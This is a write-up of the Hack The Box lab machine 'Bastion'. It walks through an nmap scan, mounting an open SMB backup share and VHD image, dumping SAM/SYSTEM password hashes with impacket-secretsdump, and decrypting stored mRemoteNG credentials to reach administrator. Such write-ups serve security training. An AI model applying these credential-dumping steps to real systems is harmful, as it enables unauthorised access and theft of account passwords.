Bastion (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.134 10.10.10.134

Nmap scan report for 10.10.10.134
Host is up (0.12s latency).
Not shown: 996 closed ports
PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey: 
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -39m57s, deviation: 1h09m16s, median: 1s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-12T18:00:27+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-12T16:00:28
|_  start_date: 2021-07-12T08:13:18

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 12 12:00:35 2021 -- 1 IP address (1 host up) scanned in 33.68 seconds

We can see that SMB port is up, we can go on and enumerate that.

SMB

We can see there is a Backups shared disk.

After some digging, we found out that there is 2 vhd file, those files are too big to download it and analyse.

We can use mount command to mount it under our machine.

mkdir /mnt/backups
sudo mount -t cifs //10.10.10.134/Backups /mnt/backups

After that, we can use guestmount command to do another mount on the 5gb vhd file.

guestmount --add /mnt/backups/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro /mnt/vhd -v

Mounted to the vhd file !

After that, I searched for the password but found nothing, forum hint us to find under System32 directory.

We can see that we are able to read SAM and SYSTEM file. By using impacket command, we can dump password hashes from there using secretdump. We can proceed to copy the SAM and SYSTEM file to our local machine.

impacket-secretsdump -sam SAM -system SYSTEM local

We can see there are some hashes popping up.

Those are LM hash and NTLM hash.

I've tried using crackstation to decrypt each part of the hash.

At the end, NTLM hash of user L4mpje got the password.

Then we can proceed to login to user L4mpjeusing SSH since port 22 is up.

User

Privilege Escalation

After some enumeration, we can see that mRemoteNG here.

From this article, we can know that it has credentials stored inside confCons.xml

We can see the administrator hash here.

We also can find the hash decryp script at github here.

After decrypt, we got the password and can SSH to administrator.

Got Root !